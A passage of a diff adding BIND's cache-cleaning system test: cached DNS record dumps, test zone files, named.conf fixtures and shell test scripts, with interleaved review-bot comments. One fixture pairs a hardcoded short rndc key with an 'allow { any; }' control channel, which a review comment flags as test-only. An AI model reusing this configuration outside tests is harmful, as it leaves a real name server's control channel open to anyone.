205.227.232.9 +NS1 IN A 216.226.16.146 +$ORIGIN MAIL.com. +NS2 IN A 165.251.1.3 +GTLD IN A 165.251.1.239 +NS1 IN A 165.251.1.2 +$ORIGIN moonmothers.com. +localhost IN A 127.0.0.1 +www IN CNAME moonmothers.com. +$ORIGIN vhv.com. +mail IN A 208.5.161.11 +$ORIGIN BOCA15-VERIO.com. +NS15B IN A 208.55.91.51 +NS15A IN A 208.55.91.50 +$ORIGIN ar.com. +ns2 IN A 64.124.80.42 +ibd IN A 63.194.205.75 +mail IN A 63.194.205.74 +NS1 IN A 63.194.205.74 +$ORIGIN BLIPP.com. +VIC20 IN A 195.163.165.35 +$ORIGIN CONCOURSE.com. +NS IN A 199.218.113.2 +$ORIGIN velco.com. +mail IN A 198.136.217.106 +$ORIGIN FLONETWORK.com. +UUNS1DNS1 IN A 209.167.79.5 +UUNS1DNS2 IN A 209.167.79.6 +$ORIGIN overstock.com. +NS1 IN A 207.225.194.13 +$ORIGIN NEWACCOUNT.com. +NS4 IN A 209.78.16.6 +NS2 IN A 209.78.16.5 +NS3 IN A 216.121.32.205 +NS IN A 216.121.32.10 +$ORIGIN tridog.com. +NS2 IN A 206.168.112.51 +TRIDOG1 IN A 206.168.112.71 +$ORIGIN madriver.com. +bend IN A 207.136.232.15 +FUSION IN A 207.136.232.11 +PRIMUS IN A 207.136.232.12 +$ORIGIN catic1.com. +Mail IN A 207.190.204.103 +$ORIGIN IBD.com. +NIC IN A 209.249.61.18 +$ORIGIN IOM.com. +PEBBLES IN A 194.72.124.1 +$ORIGIN nominum.com. +shell IN A 204.152.187.59 +GNS2 IN A 198.133.199.2 +gns1 IN A 198.133.199.1 +$ORIGIN ATLONLINE.com. 
+ATLNET IN A 207.153.72.193 +ATLWEB1 IN A 207.153.72.194 +$ORIGIN hill.com. +SYRUP IN A 208.162.106.3 +$ORIGIN garmontusa.com. +mail IN A 64.30.8.178 +$ORIGIN VIX.com. +NS-EXT IN A 204.152.184.64 +ns-int IN A 204.152.184.65 +$ORIGIN rc.VIX.com. +db IN A 204.152.187.21 +$ORIGIN SOVAM.com. +NS IN A 194.67.2.97 +$ORIGIN IOS.com. +NOC IN A 198.4.75.69 +$ORIGIN BOSTON.juno.com. +NS IN A 64.136.25.53 +$ORIGIN JERSEY.juno.com. +NS IN A 64.136.17.178 +$ORIGIN NYC.juno.com. +NS IN A 205.231.108.1 +$ORIGIN MEITCA.com. +NS1 IN A 137.203.5.1 +$ORIGIN glaxowellcome.com. +firewall3 IN A 192.58.204.207 +firewall1 IN A 192.58.204.204 +NS IN A 192.58.204.113 +$ORIGIN EPILOGUE.com. +QUERN IN A 128.224.1.136 +$ORIGIN CLASSIFIEDMONSTER.com. +NS1 IN A 216.254.54.22 +$ORIGIN nova-data.com. +mail IN A 12.16.110.35 +$ORIGIN corning.com. +GATEKEEPER IN A 149.42.1.2 +$ORIGIN a1.YIMG.com. +us IN CNAME a32.g.a.yimg.com. +$ORIGIN i1.YIMG.com. +us IN CNAME a1.g.a.yimg.com. +$ORIGIN nc.us.IBM.com. +e24 IN A 32.97.136.230 +e22 IN A 32.97.136.228 +e23 IN A 32.97.136.229 +e21 IN A 32.97.136.227 +$ORIGIN co.us.IBM.com. +e34 IN A 32.97.110.132 +e32 IN A 32.97.110.130 +e33 IN A 32.97.110.131 +e31 IN A 32.97.110.129 +$ORIGIN ny.us.IBM.com. +e4 IN A 32.97.182.104 +e2 IN A 32.97.182.102 +e3 IN A 32.97.182.103 +e1 IN A 32.97.182.101 +$ORIGIN AUSTIN.IBM.com. +NS IN A 192.35.232.34 +$ORIGIN ZURICH.IBM.com. +INTERNET-SERVER IN A 195.212.119.252 +$ORIGIN ALMADEN.IBM.com. +NS IN A 198.4.83.35 +$ORIGIN ERS.IBM.com. +NS IN A 204.146.173.35 +$ORIGIN WATSON.IBM.com. +NS IN A 198.81.209.2 +$ORIGIN DCCSERVER.com. +GODFEVER IN A 208.137.22.6 +$ORIGIN SUN.com. +saturn IN A 192.9.25.2 +venus IN A 192.9.25.5 +east IN MX 40 mars.sun.com. + IN MX 40 mondzo.sun.com. + IN MX 5 venus.sun.com. + IN MX 5 lukla.sun.com. + IN MX 5 saturn.sun.com. + IN MX 5 patan.sun.com. + IN MX 15 mercury.sun.com. 
+mondzo IN A 192.18.100.1 +lukla IN A 192.18.98.31 +NS-BRM IN A 192.18.99.5 +ns-os IN A 192.9.9.6 +patan IN A 192.18.98.43 +mars IN A 192.9.22.1 +mercury IN A 192.9.25.1 +NS IN A 192.9.9.3 +$ORIGIN pr.SUN.com. +ns1 IN A 192.18.16.2 +$ORIGIN eu.SUN.com. +ns1 IN A 192.18.240.8 +$ORIGIN USEC.SUN.com. +NS IN A 192.9.48.3 +$ORIGIN PSHIFT.com. +ns2 IN A 208.153.85.21 +NS1 IN A 208.153.85.20 +$ORIGIN mobydark.com. +ns1 IN A 216.13.76.21 +$ORIGIN compuserve.com. +DUB-NAME-SVC-1 IN A 149.174.213.5 +ARL-NAME-SVC-1 IN A 149.174.211.5 +$ORIGIN NS.cs.com. +DNS-02 IN A 205.188.157.235 +DNS-01 IN A 152.163.159.235 +$ORIGIN pcode.com. +ns1 IN A 216.15.192.135 +$ORIGIN AVENUEA.com. +EX2-DNS0 IN A 216.34.88.20 +SEA2DNS IN A 63.251.8.150 +$ORIGIN PHOTOTRUST.com. +Filer IN A 64.85.86.172 +NS02 IN A 64.85.86.142 +www IN A 64.85.86.151 +NS01 IN A 64.85.86.141 +$ORIGIN GOOGLE.com. +HEDNS1 IN A 64.209.200.10 +helbdns IN A 64.209.200.252 +valbdns IN A 216.239.37.252 +exlbdns IN A 64.208.34.252 +sulbdns IN A 64.208.32.252 +NS IN A 209.185.108.134 +sjlbdns IN A 216.239.35.252 +NS2 IN A 209.185.108.135 +$ORIGIN ns0.com. +NS00 IN A 216.92.60.60 +ns0 IN A 209.197.64.1 +$ORIGIN best.com. +NS3 IN A 209.24.149.42 +mail2 IN A 206.184.139.12 + IN A 206.184.139.13 + IN A 206.184.139.16 + IN A 206.184.139.18 +mail3 IN A 206.184.139.12 + IN A 206.184.139.13 + IN A 206.184.139.16 + IN A 206.184.139.18 +mail4 IN A 206.184.139.12 + IN A 206.184.139.13 + IN A 206.184.139.16 + IN A 206.184.139.18 +NS1 IN A 209.24.149.41 +mail1 IN A 206.184.139.12 + IN A 206.184.139.13 + IN A 206.184.139.16 + IN A 206.184.139.18 +NS2 IN A 209.157.102.11 +$ORIGIN WESTOL.com. +NS IN A 63.93.137.4 +$ORIGIN ilovedomain.com. +ns IN A 211.175.164.170 +$ORIGIN symquest.com. +Quest-7 IN A 64.69.102.131 +$ORIGIN QUEST-NET.com. +mail IN A 207.140.30.11 +NS2 IN A 207.140.30.13 +NS1 IN A 207.140.30.11 +$ORIGIN cavebear.com. +p2 IN A 199.184.128.35 +npax IN A 192.203.17.71 +$ORIGIN cacheware.com. 
+ns1 IN A 64.221.210.242 +$ORIGIN Algebra.com. +ns3 IN A 216.254.54.22 +ns1 IN A 160.79.196.177 +NS5 IN A 208.233.99.161 +$ORIGIN gmcr.com. +gateway1 IN A 12.34.108.130 +$ORIGIN YAHOO.com. +NS1 IN A 204.71.200.33 +$ORIGIN EUROPE.YAHOO.com. +NS3 IN A 217.12.4.71 +$ORIGIN DCX.YAHOO.com. +NS5 IN A 216.32.74.10 +$ORIGIN GRANITECANYON.com. +NS2 IN A 204.1.217.148 +NS1 IN A 205.166.226.38 +$ORIGIN costorf.com. +localhost IN A 127.0.0.1 +www IN CNAME costorf.com. +$ORIGIN PSG.com. +RAIN IN A 147.28.0.34 +RIP IN A 147.28.0.39 +$ORIGIN vt.highmeadow.com. +hm6 IN A 207.136.209.6 +$ORIGIN btinternet.com. +DNS2 IN A 194.73.73.94 +DNS1 IN A 194.73.73.95 +$ORIGIN INTERNET-TOOLS.com. +NS2 IN A 206.109.113.140 +NS IN A 208.239.1.2 +NS3 IN A 38.153.179.2 +$ORIGIN CADABRA.com. +NS2 IN A 209.157.194.109 +NS IN A 209.143.240.148 +$ORIGIN SLOWMOE.com. +NS2 IN A 137.118.8.50 +NS1 IN A 137.118.8.49 +$ORIGIN ZTNET.com. +NS2 IN A 63.211.17.252 +NS1 IN A 63.211.17.251 +$ORIGIN HOTWIRED.com. +NS2 IN A 209.185.151.6 +NS4 IN A 209.185.151.4 +NS1 IN A 216.32.228.8 +NS3 IN A 216.32.228.9 +$ORIGIN g-world.com. +NS1 IN A 216.26.39.10 +$ORIGIN alcatrazmedia.com. +ns1 IN A 167.160.132.2 +$ORIGIN MESSAGESECURE.com. +KYNSE02 IN A 216.142.252.201 +KYNSE01 IN A 216.142.252.199 +$ORIGIN HAITIWORLD.com. +APPSRV IN A 206.152.15.34 +NS IN A 206.152.15.33 +$ORIGIN NETSOL.com. +NS2 IN A 198.17.208.71 +RS0 IN A 216.168.224.206 +NS3 IN A 216.168.224.201 +NS1 IN A 216.168.224.200 +$ORIGIN cmates.com. +NS-AUTH2 IN A 208.23.213.3 +ns-auth1 IN A 208.23.213.2 +$ORIGIN skiinsurance.com. +mail IN A 207.136.205.152 +$ORIGIN GH.com. +AUSTIN IN A 196.3.64.1 +$ORIGIN DIGISERVE.com. +NS2 IN A 204.91.84.216 +NS1 IN A 151.196.69.5 +$ORIGIN map.com. +sgi1 IN A 204.71.19.20 +WORMHOLE IN A 204.71.19.10 +$ORIGIN SNS-UT.DEBIS.com. +NS2 IN A 53.122.2.10 +$ORIGIN SNS-FELB.DEBIS.com. +NS1 IN A 53.122.1.10 +$ORIGIN idx.com. 
+seaipsvcs IN A 172.22.64.42 +BOSDOC IN A 198.114.171.109 +drawbridge IN A 204.165.241.2 +IDXNMS IN A 204.165.242.7 +idx IN A 198.114.171.160 +isdev IN A 198.181.234.9 +bvtipsvcs IN A 198.114.172.50 +bosdns IN A 198.114.171.109 +bvtsweeper IN A 198.181.234.69 +$ORIGIN VERITAS.com. +NS IN A 204.177.156.38 +$ORIGIN BFG.com. +gateway2 IN A 166.102.214.66 +aisvt IN MX 0 gateway2.bfg.com. +GATEWAY IN A 131.187.253.2 +$ORIGIN sleepycat.com. +abyssinian IN A 199.103.241.218 +$ORIGIN cisco.com. +proxy6 IN A 203.41.198.245 +proxy9 IN A 192.135.250.71 +proxy1 IN A 192.31.7.88 +proxy2 IN A 192.31.7.89 +proxy3 IN A 192.31.7.90 +ns1 IN A 128.107.241.185 +NS2 IN A 192.135.250.69 +$ORIGIN TOAPLAN.com. +www IN A 216.42.31.169 +$ORIGIN INTUIT.com. +DNS1 IN A 208.157.255.4 +$ORIGIN REGEX.com. +NS1 IN A 202.152.12.227 +$ORIGIN DEC.com. +crl IN A 192.58.206.2 +ns IN A 204.123.2.42 +$ORIGIN PA.DEC.com. +UUCP-GW-2 IN A 16.1.0.19 +UUCP-GW-1 IN A 16.1.0.18 + IN A 204.123.2.18 +$ORIGIN LANDLORDS.com. +NS IN A 63.64.164.68 +$ORIGIN hometownbands.com. +www IN A 209.67.235.38 +$ORIGIN MSFT.AKADNS.com. +Z6 IN A 207.229.152.20 +Z2 IN A 32.96.80.17 +Z4 IN A 208.148.96.220 +Z7 IN A 213.161.66.158 +Z3 IN A 63.215.198.67 +Z1 IN A 216.32.118.104 +$ORIGIN smuggs.com. +mail IN A 209.67.230.71 +$ORIGIN OUTREMER.com. +MANTA IN A 213.16.1.106 +$ORIGIN hns.com. +HNS3 IN A 208.236.67.3 +$ORIGIN TRIVALLEY.com. +NS3 IN A 206.25.132.30 +$ORIGIN AI-R.com. +NS2 IN A 66.33.4.51 +NS1 IN A 66.33.0.143 +$ORIGIN ALCATEL.com. +NS IN A 192.160.6.91 +PRIMARY IN A 192.160.6.90 +$ORIGIN GENDYN.com. +NET2 IN A 204.60.171.9 +NET1 IN A 204.60.171.8 +$ORIGIN ONLINEPHOTOCONTEST.com. +www IN A 64.85.86.152 +$ORIGIN performancediver.com. +listserv IN A 216.34.185.155 +$ORIGIN rge.com. +gw IN A 157.225.178.11 +$ORIGIN NS.AOL.com. +DNS-02 IN A 205.188.157.232 +DNS-01 IN A 152.163.159.232 +$ORIGIN MANY-PATHS-ENERGY-ENHANCEMENT.com. +www IN A 66.33.4.50 +$ORIGIN IS.CHRYSLER.com. 
+FXCLPR02 IN A 204.189.94.37 +FXIOD01 IN A 204.189.94.70 +$ORIGIN TO.GD-ES.com. +NS IN A 199.107.240.66 +$ORIGIN GNAC.com. +ns2 IN A 209.182.195.77 +NS1 IN A 209.182.195.77 +$ORIGIN AKAMAI.com. +YA IN A 204.178.118.68 +ACCESS IN A 4.17.143.9 +YB IN A 204.212.232.16 +YC IN A 209.246.46.48 +YD IN A 209.189.112.39 +YE IN A 192.215.168.18 +YF IN A 216.32.118.14 +YG IN A 204.178.110.35 +YH IN A 128.11.61.225 +$ORIGIN QUICKEN.com. +DNS4 IN A 198.3.99.252 +DNS2 IN A 206.154.105.67 +news IN MX 10 mail1.emailpub.com. + IN MX 10 mail2.emailpub.com. + IN MX 10 mail3.emailpub.com. + IN MX 10 mail4.emailpub.com. + IN MX 10 mail5.emailpub.com. + IN MX 10 mail6.emailpub.com. + IN A 207.211.106.100 +DNS3 IN A 198.3.96.252 +DNS1 IN A 206.154.105.66 +$ORIGIN LUXNOC.com. +NS4 IN A 195.206.104.201 +NS2 IN A 195.206.105.102 +NS0 IN A 195.206.105.1 +NS5 IN A 195.206.104.211 +NS3 IN A 195.206.104.1 +NS1 IN A 195.206.105.101 +$ORIGIN MAGIC-MOMENTS.com. +NS1 IN A 195.224.53.80 +$ORIGIN ABAC.com. +NS2 IN A 216.55.144.4 +NS1 IN A 216.55.128.4 +$ORIGIN GOTO.com. +NS2 IN A 204.71.128.137 +NS1 IN A 206.132.152.241 +$ORIGIN WEBTRENDS.com. +NS2 IN A 63.88.212.11 +NS1 IN A 63.88.212.10 +$ORIGIN hotmail.com. +NS3 IN A 209.185.130.68 +NS1 IN A 216.200.206.140 +$ORIGIN MERCHANTWARE.com. +NS2 IN A 209.170.142.35 +$ORIGIN MERCURYCENTER.com. +cgi IN CNAME vh80167.vh8.infi.net. +$ORIGIN CARIBSURF.com. +COL2 IN A 205.214.192.202 +COL1 IN A 205.214.192.201 +$ORIGIN MAIL-LIST.com. +zip IN MX 20 sluice.mail-list.com. + IN MX 20 pipeline.mail-list.com. + IN MX 20 transport.mail-list.com. + IN MX 50 swifty.mail-list.com. + IN MX 50 velocity.mail-list.com. + IN MX 50 brisk.mail-list.com. + IN MX 5 zip.mail-list.com. +$ORIGIN NAVPOINT.com. +south IN A 207.106.42.12 +north IN A 207.106.42.10 +NS2 IN A 207.106.42.12 +NS IN A 207.106.42.10 +$ORIGIN verisign-grs.com. +ns2 IN A 198.41.3.108 +ns1 IN A 198.41.3.39 +$ORIGIN gdarm.com. +bvt-ext IN A 166.19.32.42 +$ORIGIN REDHAT.com. 
+NS1 IN A 216.148.218.250 +$ORIGIN SKYNETWEB.com. +NS2 IN A 208.231.1.35 +NS1 IN A 208.231.1.34 +$ORIGIN COIL.com. +BRONZE IN A 198.4.94.1 +$ORIGIN ZTX.COMPAQ.com. +NS1-PUBLIC IN A 161.114.1.204 +$ORIGIN ZMA.COMPAQ.com. +NS1-PUBLIC IN A 161.114.64.24 +$ORIGIN FOOL.com. +NS2 IN A 208.51.76.222 +NS1 IN A 208.241.66.222 +$ORIGIN retro.com. +www IN A 205.179.181.195 +gw IN A 205.179.181.194 +$ORIGIN NRSITE.com. +NS5 IN A 208.178.169.4 +NS7 IN A 206.41.20.3 +NS3 IN A 199.172.144.20 +$ORIGIN jerusalem-mail.com. +mail IN A 216.251.232.93 +$ORIGIN PAIR.com. +ns3 IN A 209.68.1.15 +NS1 IN A 209.68.1.11 +$ORIGIN GLOBALDNS.com. +NS1 IN A 206.253.214.11 +$ORIGIN tfm.com. +mailhost IN A 192.231.224.11 +mtbaker IN A 192.231.224.2 +NS2 IN A 208.236.160.42 +NS1 IN A 209.83.142.82 +NS IN A 192.231.224.1 +$ORIGIN bock.com. +NS2 IN A 64.30.29.4 +NS1 IN A 64.30.29.3 +$ORIGIN TARSUS.com. +MAIL IN A 208.130.9.252 +BEAR IN A 208.130.9.248 +$ORIGIN NETANET.com. +NS0 IN A 194.6.96.218 + IN A 195.172.127.72 +NS1 IN A 194.6.96.218 +$ORIGIN SEANET.com. +DNS2 IN A 199.181.164.2 +DNS3 IN A 199.181.164.3 +DNS1 IN A 199.181.164.1 +$ORIGIN INTERNETSHARE.com. +NS1 IN A 63.207.108.53 +$ORIGIN ALTAVISTA.com. +NS2 IN A 209.73.164.7 +NS3 IN A 209.73.176.204 +NS1 IN A 209.73.164.76 +$ORIGIN NOVELL.com. +NS IN A 137.65.1.1 +$ORIGIN SAIPAN.com. +NS2 IN A 202.128.28.2 +NS IN A 202.128.27.2 +$ORIGIN diebold.com. +eliot IN A 204.151.249.21 +ness IN A 208.228.181.21 +$ORIGIN WonderWorks.com. +mail IN A 192.203.206.67 +ice IN A 192.203.206.9 +$ORIGIN SIGNALZ.com. +NS IN A 209.67.230.71 +$ORIGIN GW.tislabs.com. +RELAY IN A 192.94.214.100 +$ORIGIN CAIS.com. +NS IN A 205.177.10.10 +$ORIGIN tesserae.com. +ns2 IN A 209.157.194.3 +NS IN A 209.157.194.2 +$ORIGIN NETPOLICY.com. +MINION IN A 207.87.121.66 +$ORIGIN wirbel.com. +enterprise IN A 194.231.54.2 +$ORIGIN fiberia.com. +webmail IN A 216.55.147.2 +$ORIGIN BAYAREA.com. +www IN CNAME vh80040.vh8.infi.net. +$ORIGIN CONNACTIVITY.com. 
+bparker IN A 206.34.200.200
+NS2 IN A 206.34.200.3
+CONNACTIVITY IN A 206.34.200.2
+$ORIGIN tifosi.com.
+BK IN A 208.58.189.13
+daytona IN A 192.104.156.3
+$ORIGIN bucksnet.com.
+gutenberg IN A 207.113.15.5
+$ORIGIN ivillage.com.
+NS2 IN A 209.185.162.16
+NS1 IN A 209.185.162.15
+$ORIGIN codelocal.com.
+ns1 IN A 216.15.192.130
+$ORIGIN NETFLIGHT.com.
+DNS IN A 207.88.32.2
+$ORIGIN MERCHANTWARE.CON.
+NS1 IN A 209.170.142.34
diff --git a/bin/tests/system/cacheclean/ns1/expire-test.db b/bin/tests/system/cacheclean/ns1/expire-test.db
new file mode 100644
index 0000000..8085543
--- /dev/null
+++ b/bin/tests/system/cacheclean/ns1/expire-test.db
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ IN SOA hostmaster.ns ns (
+ 2011072900
+ 600
+ 600
+ 1200
+ 3600
+ )
+ NS ns
+ns IN A 10.53.0.1
diff --git a/bin/tests/system/cacheclean/ns1/flushtest.db b/bin/tests/system/cacheclean/ns1/flushtest.db
new file mode 100644
index 0000000..ac6b408
--- /dev/null
+++ b/bin/tests/system/cacheclean/ns1/flushtest.db
@@ -0,0 +1,44 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+$ORIGIN flushtest.example.
+@ IN SOA flushtest.example. ns.flushtest.example. (
+ 2011072900
+ 600
+ 600
+ 1200
+ 3600
+ )
+ NS ns
+ns IN A 10.53.0.1
+
+top1 IN TXT "text"
+second1.top1 IN TXT "text"
+third1.second1.top1 IN TXT "text"
+third2.second1.top1 IN TXT "text"
+second2.top1 IN TXT "text"
+second3.top1 IN TXT "text"
+
+; top2 node is omitted for testing with an empty nonterminal
+second1.top2 IN TXT "text"
+second2.top2 IN TXT "text"
+second3.top2 IN TXT "text"
+
+top3 IN TXT "text"
+second1.top3 IN TXT "text"
+third1.second1.top3 IN TXT "text"
+third2.second1.top3 IN TXT "text"
+; second2.top3 is omitted for testing with an empty nontermianl
+third1.second2.top3 IN TXT "text"
+third2.second2.top3 IN TXT "text"
+second3.top3 IN TXT "text"
+
diff --git a/bin/tests/system/cacheclean/ns1/named.args b/bin/tests/system/cacheclean/ns1/named.args
new file mode 100644
index 0000000..2ba9a14
--- /dev/null
+++ b/bin/tests/system/cacheclean/ns1/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 1 -D cacheclean-ns1 -X named.lock -g -T maxcachesize=2097152
diff --git a/bin/tests/system/cacheclean/ns1/named.conf.in b/bin/tests/system/cacheclean/ns1/named.conf.in
new file mode 100644
index 0000000..98d2b28
--- /dev/null
+++ b/bin/tests/system/cacheclean/ns1/named.conf.in
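Review bot: The comment `; second2.top3 is omitted for testing with an empty nontermianl` in ns1/flushtest.db misspells "nonterminal", which the matching comment for top2 a few lines above it spells correctly. These two comments are the only explanation of why the owner names top2 and second2.top3 are deliberately absent from the zone, so a search for "empty nonterminal" should find both. I would correct it to `; second2.top3 is omitted for testing with an empty nonterminal`.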
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify yes;
+ check-integrity no;
+ minimal-responses no;
+};
+
+zone "." {
+ type primary;
+ file "example.db";
+};
+
+zone "flushtest.example" {
+ type primary;
+ file "flushtest.db";
+};
+
+zone "expire-test" {
+ type primary;
+ file "expire-test.db";
+};
diff --git a/bin/tests/system/cacheclean/ns2/named.args b/bin/tests/system/cacheclean/ns2/named.args
new file mode 100644
index 0000000..1bcc5ea
--- /dev/null
+++ b/bin/tests/system/cacheclean/ns2/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 3 -D cacheclean-ns2 -X named.lock -g -T maxcachesize=2097152
diff --git a/bin/tests/system/cacheclean/ns2/named.conf.in b/bin/tests/system/cacheclean/ns2/named.conf.in
new file mode 100644
index 0000000..554730e
--- /dev/null
+++ b/bin/tests/system/cacheclean/ns2/named.conf.in
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ notify yes;
+ disable-empty-zone 127.IN-ADDR.ARPA;
+ recursion yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "flushtest.example" {
+ type forward;
+ forwarders { 10.53.0.1; };
+};
+
+zone "expire-test" {
+ type secondary;
+ primaries { 10.53.0.1; };
+};
diff --git a/bin/tests/system/cacheclean/setup.sh b/bin/tests/system/cacheclean/setup.sh
new file mode 100644
index 0000000..36969b7
--- /dev/null
+++ b/bin/tests/system/cacheclean/setup.sh
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
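Review bot: In ns2/named.conf.in the `controls` statement combines `allow { any; }` with a short, fixed key (`secret "1234abcd8765";`), so the published key is the only barrier on the control channel and nothing in the file says this is deliberate. That is presumably acceptable only because 10.53.0.2 is a test-only address, which this hunk does not itself establish. I would record the intent above the key with a comment such as `/* test-only rndc key; never reuse outside the system tests */`. If the harness always connects from the 10.53.0.x test addresses (to be confirmed against the rndc configuration the tests use), the ACL could also be narrowed to `allow { 10.53.0.0/24; }`, so that a copy of this fixture does not carry an open control channel with it.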
diff --git a/bin/tests/system/cacheclean/tests.sh b/bin/tests/system/cacheclean/tests.sh
new file mode 100755
index 0000000..033caf0
--- /dev/null
+++ b/bin/tests/system/cacheclean/tests.sh
@@ -0,0 +1,268 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +RNDCOPTS="-c ../common/rndc.conf -s 10.53.0.2 -p ${CONTROLPORT}" +DIGOPTS="+nosea +nocomm +nocmd +noquest +noadd +noauth +nocomm \ + +nostat @10.53.0.2 -p ${PORT}" + +# fill the cache with nodes from flushtest.example zone +load_cache () { + # empty all existing cache data + $RNDC $RNDCOPTS flush + + # load the positive cache entries + $DIG $DIGOPTS -f - << EOF > /dev/null 2>&1 +txt top1.flushtest.example +txt second1.top1.flushtest.example +txt third1.second1.top1.flushtest.example +txt third2.second1.top1.flushtest.example +txt second2.top1.flushtest.example +txt second3.top1.flushtest.example +txt second1.top2.flushtest.example +txt second2.top2.flushtest.example +txt second3.top2.flushtest.example +txt top3.flushtest.example +txt second1.top3.flushtest.example +txt third1.second1.top3.flushtest.example +txt third2.second1.top3.flushtest.example +txt third1.second2.top3.flushtest.example +txt third2.second2.top3.flushtest.example +txt second3.top3.flushtest.example +EOF + + # load the negative cache entries + # nxrrset: + $DIG $DIGOPTS a third1.second1.top1.flushtest.example > /dev/null + # nxdomain: + $DIG $DIGOPTS txt top4.flushtest.example > /dev/null + # empty nonterminal: + $DIG $DIGOPTS txt second2.top3.flushtest.example > /dev/null + + # sleep 2 seconds ensure the TTLs will be lower on cached data + sleep 2 +} + +dump_cache () { + rndc_dumpdb ns2 -cache _default +} + +clear_cache () { + $RNDC $RNDCOPTS flush +} + +in_cache () { + ttl=`$DIG 
$DIGOPTS "$@" | awk '{print $2}'` + [ -z "$ttl" ] && { + ttl=`$DIG $DIGOPTS +noanswer +auth "$@" | awk '{print $2}'` + [ "$ttl" -ge 3599 ] && return 1 + return 0 + } + [ "$ttl" -ge 3599 ] && return 1 + return 0 +} + +# Extract records at and below name "$1" from the cache dump in file "$2". +filter_tree () { + tree="$1" + file="$2" + perl -n -e ' + next if /^;/; + if (/'"$tree"'/ || (/^\t/ && $print)) { + $print = 1; + } else { + $print = 0; + } + print if $print; + ' "$file" +} + +n=`expr $n + 1` +echo_i "check correctness of routine cache cleaning ($n)" +$DIG $DIGOPTS +tcp +keepopen -b 10.53.0.7 -f dig.batch > dig.out.ns2 || status=1 + +digcomp --lc dig.out.ns2 knowngood.dig.out || status=1 + +n=`expr $n + 1` +echo_i "only one tcp socket was used ($n)" +tcpclients=`awk '$3 == "client" && $5 ~ /10.53.0.7#[0-9]*:/ {print $5}' ns2/named.run | sort | uniq -c | wc -l` + +test $tcpclients -eq 1 || { status=1; echo_i "failed"; } + +n=`expr $n + 1` +echo_i "reset and check that records are correctly cached initially ($n)" +ret=0 +load_cache +dump_cache +nrecords=`filter_tree flushtest.example ns2/named_dump.db.test$n | grep -E '(TXT|ANY)' | wc -l` +[ $nrecords -eq 18 ] || { ret=1; echo_i "found $nrecords records expected 18"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of the full cache ($n)" +ret=0 +clear_cache +dump_cache +nrecords=`filter_tree flushtest.example ns2/named_dump.db.test$n | wc -l` +[ $nrecords -eq 0 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of individual nodes (interior node) ($n)" +ret=0 +clear_cache +load_cache +# interior node +in_cache txt top1.flushtest.example || ret=1 +$RNDC $RNDCOPTS flushname top1.flushtest.example +in_cache txt top1.flushtest.example && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushing of 
